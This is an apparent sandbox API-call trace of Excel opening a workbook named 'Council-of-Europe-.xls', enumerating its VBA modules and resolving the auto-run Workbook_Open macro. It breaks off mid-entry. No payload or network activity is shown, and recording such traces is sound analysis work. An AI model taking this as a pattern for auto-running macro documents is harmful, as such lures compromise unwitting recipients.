0xc50df50 [0155.526] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x48a8b00, cbMultiByte=-1, lpWideCharStr=0x1d0de0, cchWideChar=39 | out: lpWideCharStr="{3832D640-CF90-11CF-8E43-00A0C911005A}") returned 39 [0155.526] CLSIDFromString (in: lpsz="{3832D640-CF90-11CF-8E43-00A0C911005A}", pclsid=0xc50df7c | out: pclsid=0xc50df7c*(Data1=0x3832d640, Data2=0xcf90, Data3=0x11cf, Data4=([0]=0x8e, [1]=0x43, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x11, [6]=0x0, [7]=0x5a))) returned 0x0 [0155.526] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x48a8b27, cbMultiByte=-1, lpWideCharStr=0x1d0dd0, cchWideChar=4 | out: lpWideCharStr="VBE") returned 4 [0155.527] free (_Block=0x48a8b00) [0155.527] free (_Block=0x48a9280) [0155.527] SysStringByteLen (bstr="䉖偁潲敪瑣") returned 0xa [0155.527] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7983e88, cbMultiByte=10, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0155.527] SysStringByteLen (bstr="䉖偁潲敪瑣") returned 0xa [0155.527] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7983e88, cbMultiByte=11, lpWideCharStr=0x991ee88, cchWideChar=11 | out: lpWideCharStr="VBAProject") returned 11 [0155.527] lstrlenA (lpString="VBAProject") returned 10 [0155.527] GetCurrentThreadId () returned 0xae8 [0155.527] malloc (_Size=0x50) returned 0x48a8b00 [0155.528] GetCurrentThreadId () returned 0xae8 [0155.528] IMalloc:Alloc (This=0x7fefecb5380, cb=0x28) returned 0x991e9d0 [0155.528] GetCursorPos (in: lpPoint=0x1d0fb0 | out: lpPoint=0x1d0fb0*(x=532, y=447)) returned 1 [0155.528] GetCapture () returned 0x0 [0155.528] WindowFromPoint (Point=0x1bf00000214) returned 0x102ee [0155.528] GetWindowThreadProcessId (in: hWnd=0x102ee, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xae8 [0155.528] SendMessageA (hWnd=0x102ee, Msg=0x84, wParam=0x0, lParam=0x1bf0214) returned 0x1 [0155.529] SendMessageA (hWnd=0x102ee, Msg=0x20, wParam=0x102ee, lParam=0x2000001) returned 0x1 [0155.529] free (_Block=0xc50c790) [0155.529] free (_Block=0xc50c750) [0157.258] malloc (_Size=0x2d) returned 0xc50c750 [0157.259] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Council-of-Europe-.xls", cchWideChar=-1, lpMultiByteStr=0xc50c750, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Council-of-Europe-.xls", lpUsedDefaultChar=0x0) returned 23 [0157.259] SysStringByteLen (bstr="䉖偁潲敪瑣") returned 0xa [0157.259] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7983e88, cbMultiByte=10, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0157.259] SysStringByteLen (bstr="䉖偁潲敪瑣") returned 0xa [0157.259] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7983e88, cbMultiByte=11, lpWideCharStr=0x991ee88, cchWideChar=11 | out: lpWideCharStr="VBAProject") returned 11 [0157.260] lstrlenA (lpString="VBAProject") returned 10 [0157.260] lstrcatA (in: lpString1="VBAProject", lpString2=" (" | out: lpString1="VBAProject (") returned="VBAProject (" [0157.260] strncat_s (in: _Destination="VBAProject (", _SizeInBytes=0x187, _Source="Council-of-Europe-.xls", _MaxCount=0x28 | out: _Destination="VBAProject (Council-of-Europe-.xls") returned 0x0 [0157.260] lstrcatA (in: lpString1="VBAProject (Council-of-Europe-.xls", lpString2=")" | out: lpString1="VBAProject (Council-of-Europe-.xls)") returned="VBAProject (Council-of-Europe-.xls)" [0157.295] _wfullpath (in: _Buffer=0x1d4290, _Path="C:\\Users\\aETAdzjz\\Desktop\\Council-of-Europe-.xls", _BufferCount=0x104 | out: _Buffer="C:\\Users\\aETAdzjz\\Desktop\\Council-of-Europe-.xls") returned="C:\\Users\\aETAdzjz\\Desktop\\Council-of-Europe-.xls" [0157.295] lstrcmpiW (lpString1="C:\\Users\\aETAdzjz\\Desktop\\Council-of-Europe-.xls", lpString2="C:\\Users\\aETAdzjz\\Desktop\\Council-of-Europe-.xls") returned 0 [0157.296] malloc (_Size=0x20) returned 0x48a8050 [0157.297] malloc (_Size=0x98) returned 0x48a7ba0 [0157.297] lstrcmpiW (lpString1="ThisWorkbook", lpString2="Module1") returned 1 [0157.304] lstrlenA (lpString="Module1") returned 7 [0157.304] lstrlenA (lpString="Module1") returned 7 [0157.304] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d4520, cbMultiByte=-1, lpWideCharStr=0x48a9280, cchWideChar=8 | out: lpWideCharStr="Module1") returned 8 [0157.304] lstrcmpiW (lpString1="ThisWorkbook", lpString2="Module1") returned 1 [0157.304] malloc (_Size=0x98) returned 0x48a7c40 [0157.304] lstrcmpiW (lpString1="ThisWorkbook", lpString2="ThisWorkbook") returned 0 [0157.305] IMalloc:Alloc (This=0x7fefecb5380, cb=0xa8) returned 0x9775ab0 [0157.305] IMalloc:Alloc (This=0x7fefecb5380, cb=0x7f40) returned 0xa302a20 [0157.305] IMalloc:Alloc (This=0x7fefecb5380, cb=0x30) returned 0x9a1ddb0 [0157.316] malloc (_Size=0x28) returned 0x48a8080 [0157.316] malloc (_Size=0x140) returned 0x48a7ce0 [0157.317] lstrcmpiW (lpString1="Sheet1", lpString2="Module1") returned 1 [0157.317] lstrlenA (lpString="Module1") returned 7 [0157.317] lstrlenA (lpString="Module1") returned 7 [0157.317] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d4520, cbMultiByte=-1, lpWideCharStr=0x48a9280, cchWideChar=8 | out: lpWideCharStr="Module1") returned 8 [0157.317] lstrcmpiW (lpString1="Sheet1", lpString2="Module1") returned 1 [0157.317] lstrcmpiW (lpString1="Sheet1", lpString2="ThisWorkbook") returned -1 [0157.317] lstrlenA (lpString="ThisWorkbook") returned 12 [0157.317] lstrlenA (lpString="ThisWorkbook") returned 12 [0157.317] _msize (_Block=0x48a9280) returned 0x10 [0157.317] realloc (_Block=0x48a9280, _Size=0x1a) returned 0x48a7ff0 [0157.318] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d4520, cbMultiByte=-1, lpWideCharStr=0x48a7ff0, cchWideChar=13 | out: lpWideCharStr="ThisWorkbook") returned 13 [0157.318] lstrcmpiW (lpString1="Sheet1", lpString2="ThisWorkbook") returned -1 [0157.318] malloc (_Size=0x98) returned 0x48a7e30 [0157.318] lstrcmpiW (lpString1="Sheet1", lpString2="Sheet1") returned 0 [0157.318] IMalloc:Alloc (This=0x7fefecb5380, cb=0xa8) returned 0x9772250 [0157.318] IMalloc:Alloc (This=0x7fefecb5380, cb=0x30) returned 0x9a25f70 [0157.319] lstrcmpiW (lpString1="Sheet2", lpString2="Module1") returned 1 [0157.319] lstrlenA (lpString="Module1") returned 7 [0157.319] lstrlenA (lpString="Module1") returned 7 [0157.319] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d4520, cbMultiByte=-1, lpWideCharStr=0x48a9280, cchWideChar=8 | out: lpWideCharStr="Module1") returned 8 [0157.319] lstrcmpiW (lpString1="Sheet2", lpString2="Module1") returned 1 [0157.319] lstrcmpiW (lpString1="Sheet2", lpString2="ThisWorkbook") returned -1 [0157.320] lstrlenA (lpString="ThisWorkbook") returned 12 [0157.320] lstrlenA (lpString="ThisWorkbook") returned 12 [0157.320] _msize (_Block=0x48a9280) returned 0x10 [0157.320] realloc (_Block=0x48a9280, _Size=0x1a) returned 0x48a7ff0 [0157.320] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d4520, cbMultiByte=-1, lpWideCharStr=0x48a7ff0, cchWideChar=13 | out: lpWideCharStr="ThisWorkbook") returned 13 [0157.320] lstrcmpiW (lpString1="Sheet2", lpString2="ThisWorkbook") returned -1 [0157.320] lstrcmpiW (lpString1="Sheet2", lpString2="Sheet1") returned 1 [0157.320] lstrlenA (lpString="Sheet1") returned 6 [0157.320] lstrlenA (lpString="Sheet1") returned 6 [0157.320] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d4520, cbMultiByte=-1, lpWideCharStr=0x48a7ff0, cchWideChar=7 | out: lpWideCharStr="Sheet1") returned 7 [0157.320] lstrcmpiW (lpString1="Sheet2", lpString2="Sheet1") returned 1 [0157.320] malloc (_Size=0x98) returned 0x48aa9f0 [0157.320] lstrcmpiW (lpString1="Sheet2", lpString2="Sheet2") returned 0 [0157.320] IMalloc:Alloc (This=0x7fefecb5380, cb=0xa8) returned 0x9778ef0 [0157.320] IMalloc:Alloc (This=0x7fefecb5380, cb=0x30) returned 0x9a399f0 [0157.321] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ThisWorkbook", cchWideChar=13, lpMultiByteStr=0x1d43f0, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ThisWorkbook", lpUsedDefaultChar=0x0) returned 13 [0157.321] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ThisWorkbook") returned 0x10e37c [0157.322] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ThisWorkbook", cchWideChar=13, lpMultiByteStr=0x1d43e0, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ThisWorkbook", lpUsedDefaultChar=0x0) returned 13 [0157.322] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="ThisWorkbook") returned 0x10e37c [0157.322] IMalloc:Alloc (This=0x7fefecb5380, cb=0x20) returned 0xa1ed5d0 [0157.322] qsort (in: _Base=0xa1ed5d0, _NumOfElements=0x4, _SizeOfElements=0x8, _PtFuncCompare=0x7fee4e5219c | out: _Base=0xa1ed5d0) [0157.322] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="ThisWorkbook", cchCount1=-1, lpString2="Module1", cchCount2=-1) returned 3 [0157.322] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Sheet1", cchCount1=-1, lpString2="ThisWorkbook", cchCount2=-1) returned 1 [0157.322] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Sheet2", cchCount1=-1, lpString2="ThisWorkbook", cchCount2=-1) returned 1 [0157.322] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Sheet2", cchCount1=-1, lpString2="Module1", cchCount2=-1) returned 3 [0157.322] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Sheet1", cchCount1=-1, lpString2="Sheet2", cchCount2=-1) returned 1 [0157.322] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Sheet1", cchCount1=-1, lpString2="Module1", cchCount2=-1) returned 3 [0157.322] bsearch (_Key=0x1d3318, _Base=0xa1ed5d0, _NumOfElements=0x4, _SizeOfElements=0x8, _PtFuncCompare=0x7fee4e5219c) returned 0xa1ed5e8 [0157.322] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="ThisWorkbook", cchCount1=-1, lpString2="Sheet1", cchCount2=-1) returned 3 [0157.322] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="ThisWorkbook", cchCount1=-1, lpString2="Sheet2", cchCount2=-1) returned 3 [0157.322] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="ThisWorkbook", cchCount1=-1, lpString2="ThisWorkbook", cchCount2=-1) returned 2 [0157.323] IMalloc:Alloc (This=0x7fefecb5380, cb=0x10) returned 0x7f0abc0 [0157.323] CLSIDFromString (in: lpsz="{00020819-0000-0000-C000-000000000046}", pclsid=0x7f0abc0 | out: pclsid=0x7f0abc0*(Data1=0x20819, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0157.323] IMalloc:Free (This=0x7fefecb5380, pv=0x9bc31d0) [0157.323] lstrcmpiW (lpString1="ThisWorkbook", lpString2="Module1") returned 1 [0157.323] lstrlenA (lpString="Module1") returned 7 [0157.323] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x48a9e40, cbMultiByte=-1, lpWideCharStr=0x48a9280, cchWideChar=8 | out: lpWideCharStr="Module1") returned 8 [0157.323] lstrcmpiW (lpString1="ThisWorkbook", lpString2="Module1") returned 1 [0157.325] IMalloc:Alloc (This=0x7fefecb5380, cb=0x20) returned 0xa1ed750 [0157.325] IMalloc:Alloc (This=0x7fefecb5380, cb=0x20) returned 0xa1ed9f0 [0157.326] IMalloc:Free (This=0x7fefecb5380, pv=0x7f0abc0) [0157.326] IMalloc:Free (This=0x7fefecb5380, pv=0xa1ed750) [0157.326] IMalloc:Free (This=0x7fefecb5380, pv=0xa1ed9f0) [0157.327] IMalloc:Alloc (This=0x7fefecb5380, cb=0x20) returned 0xa1ed9f0 [0157.327] IMalloc:Alloc (This=0x7fefecb5380, cb=0x20) returned 0xa1ed750 [0157.335] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Sheet1", cchWideChar=7, lpMultiByteStr=0x1d43f0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Sheet1", lpUsedDefaultChar=0x0) returned 7 [0157.335] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sheet1") returned 0x101ae8 [0157.335] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Sheet1", cchWideChar=7, lpMultiByteStr=0x1d43e0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Sheet1", lpUsedDefaultChar=0x0) returned 7 [0157.335] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="Sheet1") returned 0x101ae8 [0157.335] bsearch (_Key=0x1d3318, _Base=0xa1ed5d0, _NumOfElements=0x4, _SizeOfElements=0x8, _PtFuncCompare=0x7fee4e5219c) returned 0xa1ed5d8 [0157.335] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Sheet1", cchCount1=-1, lpString2="Sheet1", cchCount2=-1) returned 2 [0157.335] IMalloc:Alloc (This=0x7fefecb5380, cb=0x60) returned 0xa12afd0 [0157.335] IMalloc:Alloc (This=0x7fefecb5380, cb=0x10) returned 0x7f0abc0 [0157.335] CLSIDFromString (in: lpsz="{00020820-0000-0000-C000-000000000046}", pclsid=0x7f0abc0 | out: pclsid=0x7f0abc0*(Data1=0x20820, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0157.335] IMalloc:Free (This=0x7fefecb5380, pv=0x9bc3170) [0157.336] lstrcmpiW (lpString1="Sheet1", lpString2="Module1") returned 1 [0157.336] lstrlenA (lpString="Module1") returned 7 [0157.336] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x48a9e40, cbMultiByte=-1, lpWideCharStr=0x48a9280, cchWideChar=8 | out: lpWideCharStr="Module1") returned 8 [0157.336] lstrcmpiW (lpString1="Sheet1", lpString2="Module1") returned 1 [0157.336] IMalloc:Alloc (This=0x7fefecb5380, cb=0x20) returned 0xa1edc90 [0157.337] IMalloc:Alloc (This=0x7fefecb5380, cb=0x20) returned 0xa1edb10 [0157.338] IMalloc:Free (This=0x7fefecb5380, pv=0x7f0abc0) [0157.339] IMalloc:Free (This=0x7fefecb5380, pv=0xa1edc90) [0157.339] IMalloc:Free (This=0x7fefecb5380, pv=0xa1edb10) [0157.339] IMalloc:Alloc (This=0x7fefecb5380, cb=0x20) returned 0xa1edb10 [0157.339] IMalloc:Alloc (This=0x7fefecb5380, cb=0x20) returned 0xa1edc90 [0157.340] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Sheet2", cchWideChar=7, lpMultiByteStr=0x1d43f0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Sheet2", lpUsedDefaultChar=0x0) returned 7 [0157.340] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sheet2") returned 0x101ae9 [0157.340] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Sheet2", cchWideChar=7, lpMultiByteStr=0x1d43e0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Sheet2", lpUsedDefaultChar=0x0) returned 7 [0157.340] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="Sheet2") returned 0x101ae9 [0157.340] bsearch (_Key=0x1d3318, _Base=0xa1ed5d0, _NumOfElements=0x4, _SizeOfElements=0x8, _PtFuncCompare=0x7fee4e5219c) returned 0xa1ed5e0 [0157.340] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Sheet2", cchCount1=-1, lpString2="Sheet1", cchCount2=-1) returned 3 [0157.340] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Sheet2", cchCount1=-1, lpString2="Sheet2", cchCount2=-1) returned 2 [0157.340] IMalloc:Alloc (This=0x7fefecb5380, cb=0x60) returned 0xa12ad30 [0157.341] IMalloc:Alloc (This=0x7fefecb5380, cb=0x10) returned 0x7f0abc0 [0157.341] CLSIDFromString (in: lpsz="{00020820-0000-0000-C000-000000000046}", pclsid=0x7f0abc0 | out: pclsid=0x7f0abc0*(Data1=0x20820, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0157.341] IMalloc:Free (This=0x7fefecb5380, pv=0x9bc3110) [0157.341] lstrcmpiW (lpString1="Sheet2", lpString2="Module1") returned 1 [0157.341] lstrlenA (lpString="Module1") returned 7 [0157.341] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x48a9e40, cbMultiByte=-1, lpWideCharStr=0x48a9280, cchWideChar=8 | out: lpWideCharStr="Module1") returned 8 [0157.341] lstrcmpiW (lpString1="Sheet2", lpString2="Module1") returned 1 [0157.342] IMalloc:Alloc (This=0x7fefecb5380, cb=0x20) returned 0xa1ee470 [0157.342] IMalloc:Alloc (This=0x7fefecb5380, cb=0x20) returned 0xa1edde0 [0157.342] IMalloc:Free (This=0x7fefecb5380, pv=0x7f0abc0) [0157.343] IMalloc:Free (This=0x7fefecb5380, pv=0xa1ee470) [0157.343] IMalloc:Free (This=0x7fefecb5380, pv=0xa1edde0) [0157.343] IMalloc:Alloc (This=0x7fefecb5380, cb=0x20) returned 0xa1edde0 [0157.343] IMalloc:Alloc (This=0x7fefecb5380, cb=0x20) returned 0xa1ee470 [0157.345] malloc (_Size=0xd) returned 0x48a9280 [0157.345] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Sheet1", cchWideChar=-1, lpMultiByteStr=0x48a9280, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Sheet1", lpUsedDefaultChar=0x0) returned 7 [0157.345] lstrlenA (lpString="Sheet1") returned 6 [0157.345] lstrlenA (lpString="Sheet1") returned 6 [0157.345] lstrcatA (in: lpString1="Sheet1", lpString2=" (" | out: lpString1="Sheet1 (") returned="Sheet1 (" [0157.345] strncat_s (in: _Destination="Sheet1 (", _SizeInBytes=0x187, _Source="Sheet1", _MaxCount=0x28 | out: _Destination="Sheet1 (Sheet1") returned 0x0 [0157.345] lstrlenA (lpString="Sheet1") returned 6 [0157.345] lstrcatA (in: lpString1="Sheet1 (Sheet1", lpString2=")" | out: lpString1="Sheet1 (Sheet1)") returned="Sheet1 (Sheet1)" [0157.345] malloc (_Size=0xd) returned 0x48a92a0 [0157.345] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Sheet2", cchWideChar=-1, lpMultiByteStr=0x48a92a0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Sheet2", lpUsedDefaultChar=0x0) returned 7 [0157.345] lstrlenA (lpString="Sheet2") returned 6 [0157.345] lstrlenA (lpString="Sheet2") returned 6 [0157.345] lstrcatA (in: lpString1="Sheet2", lpString2=" (" | out: lpString1="Sheet2 (") returned="Sheet2 (" [0157.345] strncat_s (in: _Destination="Sheet2 (", _SizeInBytes=0x187, _Source="Sheet2", _MaxCount=0x28 | out: _Destination="Sheet2 (Sheet2") returned 0x0 [0157.345] lstrlenA (lpString="Sheet2") returned 6 [0157.345] lstrcatA (in: lpString1="Sheet2 (Sheet2", lpString2=")" | out: lpString1="Sheet2 (Sheet2)") returned="Sheet2 (Sheet2)" [0157.365] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Module1", cchWideChar=8, lpMultiByteStr=0x1d4330, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Module1", lpUsedDefaultChar=0x0) returned 8 [0157.365] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Module1") returned 0x101162 [0157.365] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Module1", cchWideChar=8, lpMultiByteStr=0x1d4320, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Module1", lpUsedDefaultChar=0x0) returned 8 [0157.365] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="Module1") returned 0x101162 [0157.365] bsearch (_Key=0x1d3258, _Base=0xa1ed5d0, _NumOfElements=0x4, _SizeOfElements=0x8, _PtFuncCompare=0x7fee4e5219c) returned 0xa1ed5d0 [0157.365] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Module1", cchCount1=-1, lpString2="Sheet1", cchCount2=-1) returned 1 [0157.365] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Module1", cchCount1=-1, lpString2="Module1", cchCount2=-1) returned 2 [0157.429] IMalloc:Alloc (This=0x7fefecb5380, cb=0x0) returned 0x9bcd5d0 [0157.429] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Workbook", cchWideChar=9, lpMultiByteStr=0x1de9b0, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Workbook", lpUsedDefaultChar=0x0) returned 9 [0157.429] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Workbook") returned 0x10186b [0157.442] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Workbook", cchWideChar=9, lpMultiByteStr=0x1de9b0, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Workbook", lpUsedDefaultChar=0x0) returned 9 [0157.442] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Workbook") returned 0x10186b [0157.442] IMalloc:Realloc (This=0x7fefecb5380, pv=0x9bcd5d0, cb=0x62) returned 0x7e428a0 [0157.442] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Open", cchWideChar=5, lpMultiByteStr=0x1dee80, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Open", lpUsedDefaultChar=0x0) returned 5 [0157.443] _mbscpy_s (in: _Dst=0x1decd0, _DstSizeInBytes=0xe, _Src=0x63a058a | out: _Dst=0x1decd0) returned 0x0 [0157.443] _mbscpy_s (in: _Dst=0x1decd9, _DstSizeInBytes=0x5, _Src=0x1dee80 | out: _Dst=0x1decd9) returned 0x0 [0157.443] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Workbook_Open") returned 0x10e19b [0157.447] IUnknown:AddRef (This=0x9ab5f00) returned 0x3 [0157.448] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\VBA\\7.1\\Common", ulOptions=0x0, samDesired=0x1, phkResult=0x1df1b0 | out: phkResult=0x1df1b0*=0xf10) returned 0x0 [0157.449] RegQueryValueExA (in: hKey=0xf10, lpValueName="VbaCapability", lpReserved=0x0, lpType=0x0, lpData=0x1df1a8, lpcbData=0x1df1a0*=0x4 | out: lpType=0x0, lpData=0x1df1a8*=0xb4, lpcbData=0x1df1a0*=0x4) returned 0x2 [0157.449] RegCloseKey (hKey=0xf10) returned 0x0 [0157.449] IUnknown:QueryInterface (in: This=0x9ab5f00, riid=0x7fee51c5c68*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1df258 | out: ppvObject=0x1df258*=0x0) returned 0x80004002 [0157.450] ITypeLib:RemoteGetLibAttr (in: This=0x9ab5f00, ppTLibAttr=0x1df248, pDummy=0x10 | out: ppTLibAttr=0x1df248, pDummy=0x10) returned 0x0 [0157.450] ITypeLib:LocalReleaseTLibAttr (This=0x9ab5f00) returned 0x0 [0157.450] IUnknown:Release (This=0x9ab5f00) returned 0x2 [0157.450] IUnknown:AddRef (This=0x9ab4b50) returned 0xe [0157.450] IUnknown:QueryInterface (in: This=0x9ab4b50, riid=0x7fee51c5c68*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1df258 | out: ppvObject=0x1df258*=0x0) returned 0x80004002 [0157.450] ITypeLib:RemoteGetLibAttr (in: This=0x9ab4b50, ppTLibAttr=0x1df248, pDummy=0x10 | out: ppTLibAttr=0x1df248, pDummy=0x10) returned 0x0 [0157.450] ITypeLib:LocalReleaseTLibAttr (This=0x9ab4b50) returned 0x0 [0157.450] IUnknown:Release (This=0x9ab4b50) returned 0xd [0157.450] IUnknown:AddRef (This=0x9ab64a0) returned 0x4 [0157.450] IUnknown:QueryInterface (in: This=0x9ab64a0, riid=0x7fee51c5c68*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1df258 | out: ppvObject=0x1df258*=0x0) returned 0x80004002 [0157.450] ITypeLib:RemoteGetLibAttr (in: This=0x9ab64a0, ppTLibAttr=0x1df248, pDummy=0x10 | out: ppTLibAttr=0x1df248, pDummy=0x10) returned 0x0 [0157.450] ITypeLib:LocalReleaseTLibAttr (This=0x9ab64a0) returned 0x0 [0157.450] IUnknown:Release (This=0x9ab64a0) returned 0x3 [0157.450] IUnknown:AddRef (This=0x9ab6a40) returned 0x2 [0157.450] IUnknown:QueryInterface (in: This=0x9ab6a40, riid=0x7fee51c5c68*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1df258 | out: ppvObject=0x1df258*=0x0) returned 0x80004002 [0157.450] ITypeLib:RemoteGetLibAttr (in: This=0x9ab6a40, ppTLibAttr=0x1df248, pDummy=0x10 | out: ppTLibAttr=0x1df248, pDummy=0x10) returned 0x0 [0157.450] ITypeLib:LocalReleaseTLibAttr (This=0x9ab6a40) returned 0x0 [0157.450] IUnknown:Release (This=0x9ab6a40) returned 0x1 [0157.451] IMalloc:Alloc (This=0x7fefecb5380, cb=0x18) returned 0x96551b0 [0157.451] IMalloc:Free (This=0x7fefecb5380, pv=0x96551b0) [0157.452] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Workbook", cchWideChar=9, lpMultiByteStr=0x1dead0, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Workbook", lpUsedDefaultChar=0x0) returned 9 [0157.452] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Workbook") returned 0x10186b [0157.465] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Workbook", cchWideChar=9, lpMultiByteStr=0x1dead0, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Workbook", lpUsedDefaultChar=0x0) returned 9 [0157.465] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Workbook") returned 0x10186b [0157.466] _mbscpy_s (in: _Dst=0x1de810, _DstSizeInBytes=0xa, _Src=0x5732b62 | out: _Dst=0x1de810) returned 0x0 [0157.466] _mbscpy_s (in: _Dst=0x1de810, _DstSizeInBytes=0xc, _Src=0x5732e96 | out: _Dst=0x1de810) returned 0x0 [0157.467] _mbscpy_s (in: _Dst=0x1de810, _DstSizeInBytes=0xc, _Src=0x5732f0a | out: _Dst=0x1de810) returned 0x0 [0157.467] WideCharToMultiByte 